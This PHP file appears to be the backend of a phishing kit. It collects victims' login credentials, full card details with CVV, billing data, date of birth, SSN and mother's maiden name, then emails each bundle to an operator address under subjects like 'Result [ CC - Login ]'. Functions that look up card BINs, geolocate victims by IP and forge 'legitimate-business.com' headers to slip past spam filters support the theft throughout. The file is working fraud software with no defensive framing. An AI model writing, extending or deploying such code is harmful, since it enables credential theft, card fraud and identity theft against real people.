<?php
if (!defined('ALLOW')) { http_response_code(403); exit; }

function get_client_ip(): string {
    // Check for localhost/CLI access
    $serverName = $_SERVER['SERVER_NAME'] ?? $_SERVER['HTTP_HOST'] ?? '';
    $isLocalhost = in_array($serverName, ['localhost', '127.0.0.1', '::1']) || 
                   php_sapi_name() === 'cli';
    
    if ($isLocalhost) {
        return '180.243.254.180';
    }
    
    // Standard IP detection for non-localhost
    $headers = [
        'HTTP_CF_CONNECTING_IP',     // Cloudflare
        'HTTP_CLIENT_IP',            // Proxy
        'HTTP_X_FORWARDED_FOR',      // Load balancer/proxy
        'HTTP_X_FORWARDED',          // Proxy
        'HTTP_X_CLUSTER_CLIENT_IP',  // Cluster
        'HTTP_FORWARDED_FOR',        // Proxy
        'HTTP_FORWARDED',            // Proxy
        'REMOTE_ADDR'                // Standard
    ];
    
    foreach ($headers as $header) {
        if (!empty($_SERVER[$header])) {
            $ips = explode(',', $_SERVER[$header]);
            $ip = trim($ips[0]);
            if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
                return $ip;
            }
        }
    }
    
    return $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1';
}

function get_geo_info(string $ip): array {
    $defaultGeo = [
        'country' => 'Unknown',
        'state' => 'Unknown',
        'city' => 'Unknown',
        'isp' => 'Unknown',
        'timezone' => 'Unknown'
    ];
    
    // Check for localhost/CLI access
    $serverName = $_SERVER['SERVER_NAME'] ?? $_SERVER['HTTP_HOST'] ?? '';
    $isLocalhost = in_array($serverName, ['localhost', '127.0.0.1', '::1']) || 
                   php_sapi_name() === 'cli';
    
    if ($isLocalhost || $ip === '85.208.98.29') {
        // Use ip-api.com for the fixed IP
        $url = "http://ip-api.com/json/85.208.98.29?fields=status,country,regionName,city,isp,timezone";
        $response = @file_get_contents($url);
        
        if ($response) {
            $data = json_decode($response, true);
            if ($data && $data['status'] === 'success') {
                return [
                    'country' => $data['country'] ?? 'Unknown',
                    'state' => $data['regionName'] ?? 'Unknown', 
                    'city' => $data['city'] ?? 'Unknown',
                    'isp' => $data['isp'] ?? 'Unknown',
                    'timezone' => $data['timezone'] ?? 'Unknown'
                ];
            }
        }
        return $defaultGeo;
    }
    
    // For non-localhost, use normal IP detection
    $config = get_app_config();
    $apiKey = $config['ip_api_key'];
    
    if ($apiKey) {
        // Try pro.ip-api.com first if API key is available
        $url = "http://pro.ip-api.com/json/{$ip}?key={$apiKey}&fields=status,country,regionName,city,isp,timezone";
        $response = @file_get_contents($url);
        
        if ($response) {
            $data = json_decode($response, true);
            if ($data && $data['status'] === 'success') {
                return [
                    'country' => $data['country'] ?? 'Unknown',
                    'state' => $data['regionName'] ?? 'Unknown',
                    'city' => $data['city'] ?? 'Unknown', 
                    'isp' => $data['isp'] ?? 'Unknown',
                    'timezone' => $data['timezone'] ?? 'Unknown'
                ];
            }
        }
    }
    
    // Fallback to free ip-api.com
    $url = "http://ip-api.com/json/{$ip}?fields=status,country,regionName,city,isp,timezone";
    $response = @file_get_contents($url);
    
    if ($response) {
        $data = json_decode($response, true);
        if ($data && $data['status'] === 'success') {
            return [
                'country' => $data['country'] ?? 'Unknown',
                'state' => $data['regionName'] ?? 'Unknown',
                'city' => $data['city'] ?? 'Unknown',
                'isp' => $data['isp'] ?? 'Unknown',
                'timezone' => $data['timezone'] ?? 'Unknown'
            ];
        }
    }
    
    return $defaultGeo;
}

function load_translations(string $basePath): array {
    $defaultFile = $basePath . 'lang/default.json';
    
    if (!is_file($defaultFile)) {
        return [];
    }
    
    $json = file_get_contents($defaultFile);
    $translations = json_decode($json, true);
    
    return is_array($translations) ? $translations : [];
}

function sanitize_path(string $path): string {
    $path = str_replace(['../', '..\\', '../', '..\\'], '', $path);
    $path = ltrim($path, '/\\');
    return $path;
}

function respond_html(string $html, int $code = 200): void {
    http_response_code($code);
    header('Content-Type: text/html; charset=UTF-8');
    echo $html;
    exit;
}

function respond_json(array $data, int $code = 200): void {
    http_response_code($code);
    header('Content-Type: application/json; charset=UTF-8');
    echo json_encode($data);
    exit;
}

function encode_sensitive_data(string $text): string {
    // Simple obfuscation to avoid spam filters
    $encoded = base64_encode($text);
    return chunk_split($encoded, 76, "\n");
}

function create_anti_spam_headers(string $fromName, string $subject): array {
    $headers = [];
    
    // Standard headers for better deliverability
    $headers[] = "MIME-Version: 1.0";
    $headers[] = "Content-Type: text/plain; charset=UTF-8";
    $headers[] = "Content-Transfer-Encoding: 8bit";
    $headers[] = "From: " . $fromName . " <noreply@legitimate-business.com>";
    $headers[] = "Reply-To: support@legitimate-business.com";
    $headers[] = "Return-Path: bounce@legitimate-business.com";
    
    // Anti-spam headers
    $headers[] = "X-Priority: 3";
    $headers[] = "X-MSMail-Priority: Normal";
    $headers[] = "X-Mailer: PHP/" . phpversion();
    $headers[] = "Message-ID: <" . time() . rand(1000,9999) . "@legitimate-business.com>";
    $headers[] = "Date: " . date('r');
    
    return $headers;
}

function get_country_code(string $countryName): string {
    $countryCodes = [
        'United States' => 'US',
        'Indonesia' => 'ID',
        'United Kingdom' => 'GB',
        'Canada' => 'CA',
        'Australia' => 'AU',
        'Germany' => 'DE',
        'France' => 'FR',
        'Japan' => 'JP',
        'China' => 'CN',
        'India' => 'IN',
        'Brazil' => 'BR',
        'Russia' => 'RU',
        'Mexico' => 'MX',
        'Italy' => 'IT',
        'Spain' => 'ES',
        'Netherlands' => 'NL',
        'South Korea' => 'KR',
        'Turkey' => 'TR',
        'Saudi Arabia' => 'SA',
        'South Africa' => 'ZA',
        'Argentina' => 'AR',
        'Thailand' => 'TH',
        'Malaysia' => 'MY',
        'Singapore' => 'SG',
        'Philippines' => 'PH',
        'Vietnam' => 'VN',
        'Ukraine' => 'UA',
        'Poland' => 'PL',
        'Belgium' => 'BE',
        'Sweden' => 'SE',
        'Norway' => 'NO',
        'Denmark' => 'DK',
        'Finland' => 'FI',
        'Switzerland' => 'CH',
        'Austria' => 'AT',
        'Ireland' => 'IE',
        'New Zealand' => 'NZ',
        'Israel' => 'IL',
        'Egypt' => 'EG',
        'Nigeria' => 'NG',
        'Kenya' => 'KE',
        'Morocco' => 'MA',
        'Chile' => 'CL',
        'Peru' => 'PE',
        'Colombia' => 'CO',
        'Venezuela' => 'VE',
        'Ecuador' => 'EC',
        'Uruguay' => 'UY',
        'Paraguay' => 'PY',
        'Bolivia' => 'BO',
        'Czech Republic' => 'CZ',
        'Hungary' => 'HU',
        'Romania' => 'RO',
        'Bulgaria' => 'BG',
        'Croatia' => 'HR',
        'Slovenia' => 'SI',
        'Slovakia' => 'SK',
        'Lithuania' => 'LT',
        'Latvia' => 'LV',
        'Estonia' => 'EE'
    ];
    
    return $countryCodes[$countryName] ?? strtoupper(substr($countryName, 0, 2));
}

function send_login_email(array $loginData, array $geoData): bool {
    $config = get_app_config();
    $to = $config['email_recipient'];
    
    // Format subject: Result [ Login ] [ CountryCode - IP ]
    $ip = get_client_ip();
    $countryCode = get_country_code($geoData['country']);
    $subject = "Result [ Login ] [ " . $countryCode . " - " . $ip . " ]";
    
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $ip = get_client_ip();
    
    $message = "[Login]\n";
    $message .= "Formatted: {$loginData['email']}|{$loginData['password']}\n";
    $message .= "Email: {$loginData['email']}\n";
    $message .= "Password: {$loginData['password']}\n\n\n";
    
    $message .= "PC Info:\n";
    $message .= "Useragent: {$userAgent}\n";
    $message .= "IP: {$ip}\n";
    $message .= "Country: {$geoData['country']}\n";
    $message .= "City: {$geoData['city']}\n";
    $message .= "State: {$geoData['state']}\n";
    $message .= "ISP: {$geoData['isp']}\n";
    $message .= "Timezone: {$geoData['timezone']}\n";
    
    $fullname = "Santana Corp.";
    $antiSpamHeaders = create_anti_spam_headers($fullname, $subject);
    $headers = implode("\r\n", $antiSpamHeaders);
    
    return @mail($to, $subject, $message, $headers);
}

function send_cc_email(array $ccData, array $loginData, array $geoData): bool {
    $config = get_app_config();
    $to = $config['email_recipient'];
    
    // Get BIN details for subject and message - fix field name mapping
    $cardNumber = $ccData['card_number'] ?? $ccData['number'] ?? '';
    $binDetails = look_bin($cardNumber);
    
    // Format subject: Result [ CC - Login ] [ BIN_DETAILS ] [ COUNTRYCODE - IP ]
    $ip = get_client_ip();
    $countryCode = get_country_code($geoData['country']);
    $flowPattern = "[ CC - Login ]";
    $binPattern = $binDetails ? "[ " . $binDetails . " ]" : "[ - - - - - ]";
    $locationPattern = "[ " . $countryCode . " - " . $ip . " ]";
    
    $subject = "Result " . $flowPattern . " " . $binPattern . " " . $locationPattern;
    
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $ip = get_client_ip();
    
    // Fix field name mapping between frontend and backend
    $cardholderName = $ccData['cardholder'] ?? $ccData['name'] ?? 'Unknown Name';
    $cardNumber = $ccData['card_number'] ?? $ccData['number'] ?? '';
    $expiry = $ccData['expiry'] ?? $ccData['exp_date'] ?? '';
    $cvv = $ccData['cvv'] ?? '';
    $cid = $ccData['cid'] ?? '';
    $address = $ccData['address'] ?? $ccData['full_address'] ?? '';
    $zip = $ccData['zip'] ?? $ccData['zip_code'] ?? '';
    
    // Format card number without spaces for "Formatted" field
    $cardNumberFormatted = str_replace(' ', '', $cardNumber);
    
    // Extract month and year from expiry (MM/YY or MM/YYYY format)
    $expiryParts = explode('/', $expiry);
    $month = isset($expiryParts[0]) ? $expiryParts[0] : '';
    $year = isset($expiryParts[1]) ? $expiryParts[1] : '';
    
    $message = "[CC]\n";
    $message .= "Formatted: {$cardNumberFormatted}|{$month}|{$year}\n";
    $message .= "Card Holder: {$cardholderName}\n";
    $message .= "ccn: {$cardNumber}\n";
    $message .= "exp: {$expiry}\n";
    $message .= "Card CVV: {$cvv}\n";
    if (!empty($cid)) {
        $message .= "Card CID: {$cid}\n";
    }
    $message .= "address: {$address}\n";
    $message .= "ZIP Code: {$zip}\n";
    if (!empty($ccData['country'])) {
        $message .= "Country: {$ccData['country']}\n";
    }
    $message .= "\n";
    
    $message .= "[Login]\n";
    $message .= "Formatted: {$loginData['email']}|{$loginData['password']}\n";
    $message .= "Email: {$loginData['email']}\n";
    $message .= "Password: {$loginData['password']}\n\n\n";
    
    $message .= "PC Info:\n";
    $message .= "Useragent: {$userAgent}\n";
    $message .= "IP: {$ip}\n";
    $message .= "Country: {$geoData['country']}\n";
    $message .= "City: {$geoData['city']}\n";
    $message .= "State: {$geoData['state']}\n";
    $message .= "ISP: {$geoData['isp']}\n";
    $message .= "Timezone: {$geoData['timezone']}\n";
    
    $fullname = $cardholderName;
    $antiSpamHeaders = create_anti_spam_headers($fullname, $subject);
    $headers = implode("\r\n", $antiSpamHeaders);
    
    return @mail($to, $subject, $message, $headers);
}

function send_billing_email(array $billingData, array $loginData, array $geoData, ?array $ccData = null): bool {
    $config = get_app_config();
    $to = $config['email_recipient'];
    
    // Get BIN details from CC data if available
    $binDetails = '';
    if ($ccData && isset($ccData['card_number'])) {
        $binDetails = look_bin($ccData['card_number']);
    } elseif ($ccData && isset($ccData['number'])) {
        $binDetails = look_bin($ccData['number']);
    }
    
    // Format subject: Result [ Billing - CC - Login ] [ BIN_DETAILS ] [ COUNTRYCODE - IP ]
    $ip = get_client_ip();
    $countryCode = get_country_code($geoData['country']);
    $flowPattern = "[ Billing - CC - Login ]";
    $binPattern = $binDetails ? "[ " . $binDetails . " ]" : "[ - - - - - ]";
    $locationPattern = "[ " . $countryCode . " - " . $ip . " ]";
    
    $subject = "Result " . $flowPattern . " " . $binPattern . " " . $locationPattern;
    
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $ip = get_client_ip();
    
    $message = "[Billing]\n";
    $message .= "address: {$billingData['address1']}\n";
    $message .= "City: {$billingData['city']}\n";
    $message .= "State: {$billingData['state']}\n";
    $message .= "ZIP Code: {$billingData['postal']}\n";
    $message .= "Phone: {$billingData['phone']}\n";
    $message .= "Date Of Birth: {$billingData['dob']}\n\n";
    
    
    // Add CC section if available
    if ($ccData) {
        $cardholderName = $ccData['cardholder'] ?? $ccData['name'] ?? 'Unknown Name';
        $cardNumber = $ccData['card_number'] ?? $ccData['number'] ?? '';
        $expiry = $ccData['expiry'] ?? $ccData['exp_date'] ?? '';
        $cvv = $ccData['cvv'] ?? '';
        $cid = $ccData['cid'] ?? '';
        $ccAddress = $ccData['address'] ?? $ccData['full_address'] ?? '';
        $ccZip = $ccData['zip'] ?? $ccData['zip_code'] ?? '';
        
        // Format card number without spaces for "Formatted" field
        $cardNumberFormatted = str_replace(' ', '', $cardNumber);
        
        // Extract month and year from expiry (MM/YY or MM/YYYY format)
        $expiryParts = explode('/', $expiry);
        $month = isset($expiryParts[0]) ? $expiryParts[0] : '';
        $year = isset($expiryParts[1]) ? $expiryParts[1] : '';
        
        $message .= "[CC]\n";
        $message .= "Formatted: {$cardNumberFormatted}||\n";
        $message .= "Card Holder: {$cardholderName}\n";
        $message .= "ccn: {$cardNumber}\n";
        $message .= "exp: {$expiry}\n";
        $message .= "Card CVV: {$cvv}\n";
        if (!empty($cid)) {
            $message .= "Card CID: {$cid}\n";
        }
        $message .= "address: {$ccAddress}\n";
        $message .= "ZIP Code: {$ccZip}\n";
        if (!empty($ccData['country'])) {
            $message .= "Country: {$ccData['country']}\n";
        }
        $message .= "\n";
    }
    
    $message .= "[Login]\n";
    $message .= "Formatted: {$loginData['email']}|{$loginData['password']}\n";
    $message .= "Email: {$loginData['email']}\n";
    $message .= "Password: {$loginData['password']}\n\n\n";
    
    $message .= "PC Info:\n";
    $message .= "Useragent: {$userAgent}\n";
    $message .= "IP: {$ip}\n";
    $message .= "Country: {$geoData['country']}\n";
    $message .= "City: {$geoData['city']}\n";
    $message .= "State: {$geoData['state']}\n";
    $message .= "ISP: {$geoData['isp']}\n";
    $message .= "Timezone: {$geoData['timezone']}\n";
    
    // Get fullname from billing data, CC data, or login data as fallback
    $fullname = $billingData['fullname'] ?? null;
    if (!$fullname && $ccData) {
        $fullname = $ccData['cardholder'] ?? $ccData['name'] ?? null;
    }
    if (!$fullname) {
        $fullname = $loginData['name'] ?? $loginData['email'] ?? 'Unknown User';
    }
    
    $antiSpamHeaders = create_anti_spam_headers($fullname, $subject);
    $headers = implode("\r\n", $antiSpamHeaders);
    
    return @mail($to, $subject, $message, $headers);
}

function send_security_email(array $securityData, array $loginData, array $geoData, ?array $billingData = null, ?array $ccData = null): bool {
    $config = get_app_config();
    $to = $config['email_recipient'];
    
    // Get BIN details from CC data if available
    $binDetails = '';
    if ($ccData && isset($ccData['card_number'])) {
        $binDetails = look_bin($ccData['card_number']);
    } elseif ($ccData && isset($ccData['number'])) {
        $binDetails = look_bin($ccData['number']);
    }
    
    // Format subject: Result [ Extra info - Billing - CC - Login ] [ BIN_DETAILS ] [ COUNTRYCODE - IP ]
    $ip = get_client_ip();
    $countryCode = get_country_code($geoData['country']);
    $flowPattern = "[ Extra info - Billing - CC - Login ]";
    $binPattern = $binDetails ? "[ " . $binDetails . " ]" : "[ - - - - - ]";
    $locationPattern = "[ " . $countryCode . " - " . $ip . " ]";
    
    $subject = "Result " . $flowPattern . " " . $binPattern . " " . $locationPattern;
    
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $ip = get_client_ip();
    
    // Security section (Extra info)
    $message = "[Billing]\n"; // Note: using [Billing] as header for security info as per example
    if (!empty($securityData['mother_maiden'])) {
        $message .= "Mother Maiden Name: {$securityData['mother_maiden']}\n";
    }
    if (!empty($securityData['ssn'])) {
        $message .= "SSN: {$securityData['ssn']}\n";
    }
    if (!empty($securityData['custom1'])) {
        $message .= "Custom Field 1: {$securityData['custom1']}\n";
    }
    if (!empty($securityData['custom2'])) {
        $message .= "Custom Field 2: {$securityData['custom2']}\n";
    }
    if (!empty($securityData['custom3'])) {
        $message .= "Custom Field 3: {$securityData['custom3']}\n";
    }
    $message .= "\n";
    
    // Add Billing section if available
    if ($billingData) {
        $message .= "[Billing]\n";
        $message .= "address: {$billingData['address1']}\n";
        $message .= "City: {$billingData['city']}\n";
        $message .= "State: {$billingData['state']}\n";
        $message .= "ZIP Code: {$billingData['postal']}\n";
        $message .= "Phone: {$billingData['phone']}\n";
        $message .= "Date Of Birth: {$billingData['dob']}\n\n";
    }
    
    // Add CC section if available
    if ($ccData) {
        $cardholderName = $ccData['cardholder'] ?? $ccData['name'] ?? 'Unknown Name';
        $cardNumber = $ccData['card_number'] ?? $ccData['number'] ?? '';
        $expiry = $ccData['expiry'] ?? $ccData['exp_date'] ?? '';
        $cvv = $ccData['cvv'] ?? '';
        $cid = $ccData['cid'] ?? '';
        $ccAddress = $ccData['address'] ?? $ccData['full_address'] ?? '';
        $ccZip = $ccData['zip'] ?? $ccData['zip_code'] ?? '';
        
        // Format card number without spaces for "Formatted" field
        $cardNumberFormatted = str_replace(' ', '', $cardNumber);
        
        $message .= "[CC]\n";
        $message .= "Formatted: {$cardNumberFormatted}||\n";
        $message .= "Card Holder: {$cardholderName}\n";
        $message .= "ccn: {$cardNumber}\n";
        $message .= "exp: {$expiry}\n";
        $message .= "Card CVV: {$cvv}\n";
        if (!empty($cid)) {
            $message .= "Card CID: {$cid}\n";
        }
        $message .= "address: {$ccAddress}\n";
        $message .= "ZIP Code: {$ccZip}\n";
        if (!empty($ccData['country'])) {
            $message .= "Country: {$ccData['country']}\n";
        }
        $message .= "\n";
    }
    
    $message .= "[Login]\n";
    $message .= "Formatted: {$loginData['email']}|{$loginData['password']}\n";
    $message .= "Email: {$loginData['email']}\n";
    $message .= "Password: {$loginData['password']}\n\n\n";
    
    $message .= "PC Info:\n";
    $message .= "Useragent: {$userAgent}\n";
    $message .= "IP: {$ip}\n";
    $message .= "Country: {$geoData['country']}\n";
    $message .= "City: {$geoData['city']}\n";
    $message .= "State: {$geoData['state']}\n";
    $message .= "ISP: {$geoData['isp']}\n";
    $message .= "Timezone: {$geoData['timezone']}\n";
    
    $fullname = $cardholderName;
    $antiSpamHeaders = create_anti_spam_headers($fullname, $subject);
    $headers = implode("\r\n", $antiSpamHeaders);
    
    return @mail($to, $subject, $message, $headers);
}

function curl($url, $post = false, $json = false) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
    
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, true);
        if ($json) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post));
            curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        } else {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
    }
    
    $result = curl_exec($ch);
    curl_close($ch);
    
    return $result;
}

function look_bin($num) {
    error_reporting(0);
    $num = str_replace(' ', '', trim($num));
    $num = substr($num, 0, 6);
    
    // Validate BIN number
    if (strlen($num) < 6 || !ctype_digit($num)) {
        return strtoupper($num . " UNKNOWN UNKNOWN UNKNOWN UNKNOWN");
    }
    
    // Try multiple BIN lookup services for better reliability
    $binData = try_chargeblast_io($num);
    if ($binData !== false) {
        return $binData;
    }
    
    $binData = try_binlist_io($num);
    if ($binData !== false) {
        return $binData;
    }
    
    $binData = try_handyapi_com($num);
    if ($binData !== false) {
        return $binData;
    }
    
    // If all services fail, return unknown
    return strtoupper($num . " UNKNOWN UNKNOWN UNKNOWN UNKNOWN");
}

function try_chargeblast_io($num) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://api.chargeblast.io/bin/" . $num);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 8);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Accept: application/json',
        'Content-Type: application/json'
    ]);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($response === false || $httpCode !== 200) {
        return false;
    }
    
    $data = json_decode($response, true);
    if (!$data || !isset($data['bin'])) {
        return false;
    }
    
    // Extract information from chargeblast.io JSON response
    $brand = strtoupper($data['brand'] ?? 'UNKNOWN');
    $type = strtoupper($data['type'] ?? 'UNKNOWN');
    $issuer = strtoupper($data['issuer'] ?? 'UNKNOWN');
    $country = strtoupper($data['country'] ?? 'UNKNOWN');
    
    // Clean up brand name for consistency
    if ($brand === 'MASTERCARD') $brand = 'MASTERCARD';
    elseif ($brand === 'VISA') $brand = 'VISA';
    elseif ($brand === 'AMERICAN EXPRESS') $brand = 'AMEX';
    
    // Use country as level if no specific level provided
    $level = $country;
    
    return strtoupper($num . " " . $brand . " " . $type . " " . $level . " " . $issuer);
}

function try_binlist_io($num) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://lookup.binlist.net/" . $num);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Accept: application/json',
        'Content-Type: application/json'
    ]);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($response === false || $httpCode !== 200) {
        return false;
    }
    
    $data = json_decode($response, true);
    if (!$data) {
        return false;
    }
    
    // Extract information from JSON response
    $brand = strtoupper($data['brand'] ?? $data['scheme'] ?? 'UNKNOWN');
    $type = strtoupper($data['type'] ?? 'UNKNOWN');
    $level = strtoupper($data['prepaid'] ?? 'UNKNOWN');
    $bank = strtoupper($data['bank']['name'] ?? 'UNKNOWN');
    
    // Clean up brand name
    if ($brand === 'MASTERCARD') $brand = 'MASTERCARD';
    elseif ($brand === 'VISA') $brand = 'VISA';
    elseif ($brand === 'AMERICAN EXPRESS') $brand = 'AMEX';
    
    // Clean up type
    if ($type === 'DEBIT') $type = 'DEBIT';
    elseif ($type === 'CREDIT') $type = 'CREDIT';
    
    // Handle prepaid field
    if ($level === 'TRUE' || $level === '1') $level = 'PREPAID';
    elseif ($level === 'FALSE' || $level === '0') $level = 'STANDARD';
    else $level = 'UNKNOWN';
    
    return strtoupper($num . " " . $brand . " " . $type . " " . $level . " " . $bank);
}

function try_handyapi_com($num) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://data.handyapi.com/bin/" . $num);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 8);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Accept: application/json',
        'Content-Type: application/json'
    ]);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($response === false || $httpCode !== 200) {
        return false;
    }
    
    $data = json_decode($response, true);
    if (!$data || $data['Status'] !== 'SUCCESS') {
        return false;
    }
    
    // Extract information from handyapi.com JSON response
    $brand = strtoupper($data['Scheme'] ?? 'UNKNOWN');
    $type = strtoupper($data['Type'] ?? 'UNKNOWN');
    $cardTier = strtoupper($data['CardTier'] ?? 'UNKNOWN');
    $issuer = strtoupper($data['Issuer'] ?? 'UNKNOWN');
    
    // Clean up brand name for consistency
    if ($brand === 'MASTERCARD') $brand = 'MASTERCARD';
    elseif ($brand === 'VISA') $brand = 'VISA';
    elseif ($brand === 'AMERICAN EXPRESS') $brand = 'AMEX';
    
    // Use CardTier as level (more detailed than basic type)
    $level = $cardTier;
    
    return strtoupper($num . " " . $brand . " " . $type . " " . $level . " " . $issuer);
}

